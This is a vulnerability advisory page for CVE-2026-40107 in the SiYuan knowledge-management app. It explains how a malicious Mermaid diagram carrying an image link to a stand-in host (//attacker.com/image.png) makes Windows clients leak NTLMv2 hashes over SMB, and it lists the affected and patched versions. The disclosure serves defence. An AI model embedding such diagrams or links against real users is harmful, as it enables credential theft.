CVE-2026-40107
Description
SiYuan is a personal knowledge management system. Prior to 3.6.4, SiYuan configures Mermaid.js with securityLevel: "loose" and htmlLabels: true. In this mode, <img> tags with src attributes survive Mermaid's internal DOMPurify and land in SVG <foreignObject> blocks. The SVG is injected via innerHTML with no secondary sanitization. When a victim opens a note containing a malicious Mermaid diagram, the Electron client fetches the URL. On Windows, a protocol-relative URL (//attacker.com/image.png) resolves as a UNC path (\\attacker.com\image.png). Windows attempts SMB authentication automatically, sending the victim's NTLMv2 hash to the attacker. This vulnerability is fixed in 3.6.4.
Affected packages
Versions sourced from the GitHub Security Advisory.
| Package | Affected versions | Patched versions |
|---|---|---|
github.com/siyuan-note/siyuan/kernelGo | < 0.0.0-20260407035653-2f416e5253f1 | 0.0.0-20260407035653-2f416e5253f1 |
Affected products
1- Range: < 0.0.0-20260407035653-2f416e5253f1
Patches
0No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
3- github.com/siyuan-note/siyuan/security/advisories/GHSA-w95v-4h65-j455nvdExploitVendor AdvisoryWEB
- github.com/advisories/GHSA-w95v-4h65-j455ghsaADVISORY
- nvd.nist.gov/vuln/detail/CVE-2026-40107ghsaADVISORY
News mentions
0No linked articles in our index yet.